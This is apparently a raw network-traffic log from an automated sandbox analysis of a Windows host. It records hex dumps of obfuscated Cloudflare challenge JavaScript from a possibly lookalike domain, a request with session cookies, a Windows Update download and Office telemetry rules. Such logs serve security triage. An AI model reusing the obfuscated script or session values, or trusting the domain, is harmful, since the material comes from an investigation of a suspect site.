                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8y1oullsoyb5uNa%2FWCAQMGbDL%2BX7K%2B6b5JVcdnz6PWlly9HcOmGkGZ58Rk7lKttT1x9iDQweUYAlOGd97NobpwXjx4t64aYzt9d51f4MDRt4nZJ1uX%2BgAenYJizJMfRJ6YyrzFI%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e8460dadc86f-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=2070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1380&delivery_rate=1414753&cwnd=252&unsent_bytes=0&cid=6fee010f2555dcf4&ts=164&x=0"
                                                2024-10-29 23:22:23 UTC496INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 78 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 55 2c 66 2c 67 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 2d 70 61 72 73 65 49 6e 74 28 55 28 33 31 33 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 32 39 32 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 55 28 32 35 36 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 32 39 38 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 55 28 33 30 36 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 32 36 35 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 32 36 37 29 29 2f 37 2b 70 61
                                                Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=-parseInt(U(313))/1*(-parseInt(U(292))/2)+parseInt(U(256))/3+-parseInt(U(298))/4*(parseInt(U(306))/5)+-parseInt(U(265))/6+-parseInt(U(267))/7+pa
                                                2024-10-29 23:22:23 UTC1369INData Raw: 6a 5b 56 28 33 31 35 29 5d 3d 27 6e 27 2c 6a 5b 56 28 32 39 31 29 5d 3d 27 49 27 2c 6a 5b 56 28 33 32 34 29 5d 3d 27 62 27 2c 6b 3d 6a 2c 68 5b 56 28 32 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 44 2c 45 2c 46 2c 61 30 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 61 30 3d 56 2c 44 3d 3d 3d 6e 75 6c 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 44 29 72 65 74 75 72 6e 20 46 3b 66 6f 72 28 48 3d 6e 28 44 29 2c 67 5b 61 30 28 32 37 39 29 5d 5b 61 30 28 33 31 36 29 5d 26 26 28 48 3d 48 5b 61 30 28 32 38 34 29 5d 28 67 5b 61 30 28 32 37 39 29 5d 5b 61 30 28 33 31 36 29 5d 28 44 29 29 29 2c 48 3d 67 5b 61 30 28 33 30 33 29 5d 5b 61 30 28 33 34 38 29 5d 26 26 67 5b 61 30 28 33 36 34 29 5d 3f 67 5b 61 30 28 33 30 33 29 5d 5b 61 30 28 33 34 38 29 5d 28 6e 65 77
                                                Data Ascii: j[V(315)]='n',j[V(291)]='I',j[V(324)]='b',k=j,h[V(281)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,D===null||void 0===D)return F;for(H=n(D),g[a0(279)][a0(316)]&&(H=H[a0(284)](g[a0(279)][a0(316)](D))),H=g[a0(303)][a0(348)]&&g[a0(364)]?g[a0(303)][a0(348)](new
                                                2024-10-29 23:22:23 UTC1369INData Raw: 61 36 28 32 38 38 29 5d 5b 61 36 28 33 36 30 29 5d 28 48 2c 53 29 29 4a 3d 53 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 36 28 32 36 34 29 5d 5b 61 36 28 32 38 38 29 5d 5b 61 36 28 33 36 30 29 5d 28 49 2c 4a 29 29 7b 69 66 28 32 35 36 3e 4a 5b 61 36 28 33 31 37 29 5d 28 30 29 29 7b 66 6f 72 28 47 3d 30 3b 47 3c 4d 3b 4f 3c 3c 3d 31 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 36 28 33 33 32 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 36 28 33 31 37 29 5d 28 30 29 2c 47 3d 30 3b 38 3e 47 3b 4f 3d 31 2e 37 39 26 54 7c 4f 3c 3c 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 33 33 32 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b
                                                Data Ascii: a6(288)][a6(360)](H,S))J=S;else{if(Object[a6(264)][a6(288)][a6(360)](I,J)){if(256>J[a6(317)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[a6(332)](F(O)),O=0):P++,G++);for(T=J[a6(317)](0),G=0;8>G;O=1.79&T|O<<1,P==E-1?(P=0,N[a6(332)](F(O)),O=0):P++,T>>=1,G++);}else{
                                                2024-10-29 23:22:23 UTC1369INData Raw: 3f 6e 75 6c 6c 3a 66 2e 69 28 44 5b 61 37 28 32 36 36 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 45 2c 61 38 29 7b 72 65 74 75 72 6e 20 61 38 3d 61 37 2c 44 5b 61 38 28 33 31 37 29 5d 28 45 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 45 2c 46 2c 61 39 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 54 2c 53 29 7b 66 6f 72 28 61 39 3d 61 34 2c 47 3d 5b 5d 2c 48 3d 34 2c 49 3d 34 2c 4a 3d 33 2c 4b 3d 5b 5d 2c 4e 3d 46 28 30 29 2c 4f 3d 45 2c 50 3d 31 2c 4c 3d 30 3b 33 3e 4c 3b 47 5b 4c 5d 3d 4c 2c 4c 2b 3d 31 29 3b 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 32 37 32 29 5d 28 32 2c 32 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4f 26 4e 2c 4f 3e 3e 3d 31 2c 30 3d 3d 4f 26 26 28 4f 3d 45 2c 4e 3d 46
                                                Data Ascii: ?null:f.i(D[a7(266)],32768,function(E,a8){return a8=a7,D[a8(317)](E)})},'i':function(D,E,F,a9,G,H,I,J,K,L,M,N,O,P,Q,R,T,S){for(a9=a4,G=[],H=4,I=4,J=3,K=[],N=F(0),O=E,P=1,L=0;3>L;G[L]=L,L+=1);for(Q=0,R=Math[a9(272)](2,2),M=1;M!=R;S=O&N,O>>=1,0==O&&(O=E,N=F
                                                2024-10-29 23:22:23 UTC1369INData Raw: 5d 2c 27 6e 2e 27 2c 45 29 2c 45 3d 4e 65 41 67 38 28 44 2c 67 5b 61 33 28 33 33 30 29 5d 2c 27 64 2e 27 2c 45 29 2c 69 5b 61 33 28 33 30 34 29 5d 5b 61 33 28 33 33 38 29 5d 28 67 29 2c 46 3d 7b 7d 2c 46 2e 72 3d 45 2c 46 2e 65 3d 6e 75 6c 6c 2c 46 7d 63 61 74 63 68 28 48 29 7b 72 65 74 75 72 6e 20 47 3d 7b 7d 2c 47 2e 72 3d 7b 7d 2c 47 2e 65 3d 48 2c 47 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 28 64 2c 65 2c 61 63 2c 66 2c 67 29 7b 61 63 3d 56 2c 66 3d 7b 27 77 70 27 3a 78 5b 61 63 28 33 31 31 29 5d 28 4a 53 4f 4e 5b 61 63 28 33 32 39 29 5d 28 65 29 29 2c 27 73 27 3a 61 63 28 33 33 36 29 7d 2c 67 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 67 5b 61 63 28 32 37 30 29 5d 28 61 63 28 32 37 31 29 2c 61 63 28 32 35 39 29 2b 68 5b 61 63 28 33
                                                Data Ascii: ],'n.',E),E=NeAg8(D,g[a3(330)],'d.',E),i[a3(304)][a3(338)](g),F={},F.r=E,F.e=null,F}catch(H){return G={},G.r={},G.e=H,G}}function A(d,e,ac,f,g){ac=V,f={'wp':x[ac(311)](JSON[ac(329)](e)),'s':ac(336)},g=new XMLHttpRequest(),g[ac(270)](ac(271),ac(259)+h[ac(3
                                                2024-10-29 23:22:23 UTC1369INData Raw: 2c 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 33 33 34 34 39 32 34 73 50 6e 42 4e 41 2c 66 72 6f 6d 2c 46 75 6e 63 74 69 6f 6e 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 2f 6a 73 64 2f 72 2f 2c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 2c 25 32 62 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 66 41 6f 76 36 3b 66 52 52 69 48 35 3b 4a 41 45 59 31 3b 55 67 48 57 62 30 3b 59 46 73 4b 50 35 3b 59 6a 6b 67 63 30 3b 4a 4b 68 74 48 30 3b 4c 4b 42 6e 67 31 3b 66 53 5a 49 32 3b 63 4c 56 43 34 3b 52 71 62 6c 33 3b 66 78 77 46 36 3b 66 54 62 76 36 3b 4e 65 41 67 38 3b 67 71 57 64 57 30 3b 66 72 67 47 67 38 3b 52 6b 6f 41 37 2c 69 6e 63 6c 75 64 65 73 2c 72 65 70 6c 61 63 65 2c 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 2c 69
                                                Data Ascii: ,errorInfoObject,3344924sPnBNA,from,Function,application/json,fromCharCode,/jsd/r/,[native code],%2b,_cf_chl_opt;fAov6;fRRiH5;JAEY1;UgHWb0;YFsKP5;Yjkgc0;JKhtH0;LKBng1;fSZI2;cLVC4;Rqbl3;fxwF6;fTbv6;NeAg8;gqWdW0;frgGg8;RkoA7,includes,replace,display: none,i
                                                2024-10-29 23:22:23 UTC785INData Raw: 32 39 30 29 5d 21 3d 3d 61 65 28 32 37 35 29 29 3f 66 28 29 3a 68 5b 61 65 28 32 39 39 29 5d 3f 69 5b 61 65 28 32 39 39 29 5d 28 61 65 28 32 38 35 29 2c 66 29 3a 28 67 3d 69 5b 61 65 28 33 36 32 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 5b 61 65 28 33 36 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 67 29 7b 61 67 3d 61 65 2c 67 28 29 2c 69 5b 61 67 28 32 39 30 29 5d 21 3d 3d 61 67 28 32 37 35 29 26 26 28 69 5b 61 67 28 33 36 32 29 5d 3d 67 2c 66 28 29 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 62 2c 64 2c 65 2c 66 2c 67 29 7b 69 66 28 28 61 62 3d 56 2c 64 3d 68 5b 61 62 28 32 38 36 29 5d 2c 65 3d 33 36 30 30 2c 64 2e 74 29 26 26 28 66 3d 4d 61 74 68 5b 61 62 28 33 30 38 29 5d 28 2b 61 74 6f 62 28 64 2e 74 29 29 2c 67 3d 4d 61 74 68 5b 61 62
                                                Data Ascii: 290)]!==ae(275))?f():h[ae(299)]?i[ae(299)](ae(285),f):(g=i[ae(362)]||function(){},i[ae(362)]=function(ag){ag=ae,g(),i[ag(290)]!==ag(275)&&(i[ag(362)]=g,f())})}function z(ab,d,e,f,g){if((ab=V,d=h[ab(286)],e=3600,d.t)&&(f=Math[ab(308)](+atob(d.t)),g=Math[ab


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.461360104.21.63.1724438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:24 UTC791OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/8da6e8395f456b4c HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; VPumfuh-Jr1LEJyAuZ4MQcHfc00=AxbxwTfwRw_HDcD0ux--x1yAUGk; S90wx7Zqxdox0MTF-hx9d5HWxWc=1730244136; uiFRXvUC2urtpaT39U3kjRWeybs=1730330536; 0CFu03wo8SjaBEdSDXJPVEj_U2o=7M3_LIl-0xUtCH1U9qUtTseZ-A0
                                                2024-10-29 23:22:24 UTC727INHTTP/1.1 405 Method Not Allowed
                                                Date: Tue, 29 Oct 2024 23:22:24 GMT
                                                Content-Length: 0
                                                Connection: close
                                                allow: POST
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bUim3iY4PcsjaZlndc%2FTZFaPtf%2BSfyhc7Li1a9wsJs3YMtr6M2x3bE9%2FpY8dtlEv5%2Bf23p%2FRNT0jpu8EXMBojJMp6vEDLKcBbbvV2o6g5shh5T2L3KRkZYyk6L17HzUPq0DS%2FE%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e84f6ab3e7db-DFW
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1991&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1369&delivery_rate=1432245&cwnd=251&unsent_bytes=0&cid=d884527f52da84ae&ts=167&x=0"


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.4580604.175.87.197443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:37 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PcYCYYs6TKUBHSY&MD=NVkN5bGa HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                Host: slscr.update.microsoft.com
                                                2024-10-29 23:22:37 UTC560INHTTP/1.1 200 OK
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                Content-Type: application/octet-stream
                                                Expires: -1
                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                MS-CorrelationId: 9271b98c-065c-434a-98ce-4af15b55dbf0
                                                MS-RequestId: b2d7e40b-089f-4743-b790-107dab2ce74b
                                                MS-CV: kmA8tZiLNEGJw1ij.0
                                                X-Microsoft-SLSClientCache: 1440
                                                Content-Disposition: attachment; filename=environment.cab
                                                X-Content-Type-Options: nosniff
                                                Date: Tue, 29 Oct 2024 23:22:37 GMT
                                                Connection: close
                                                Content-Length: 30005
                                                2024-10-29 23:22:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                2024-10-29 23:22:37 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.45806113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:46 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:47 UTC540INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:46 GMT
                                                Content-Type: text/plain
                                                Content-Length: 218853
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public
                                                Last-Modified: Mon, 28 Oct 2024 13:23:36 GMT
                                                ETag: "0x8DCF753BAA1B278"
                                                x-ms-request-id: acfedf75-801e-002a-2768-2931dc000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232246Z-17c5cb586f6r59nt869u8w8xt8000000069g00000000260v
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:47 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                2024-10-29 23:22:47 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                2024-10-29 23:22:47 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                2024-10-29 23:22:47 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                2024-10-29 23:22:47 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                2024-10-29 23:22:47 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
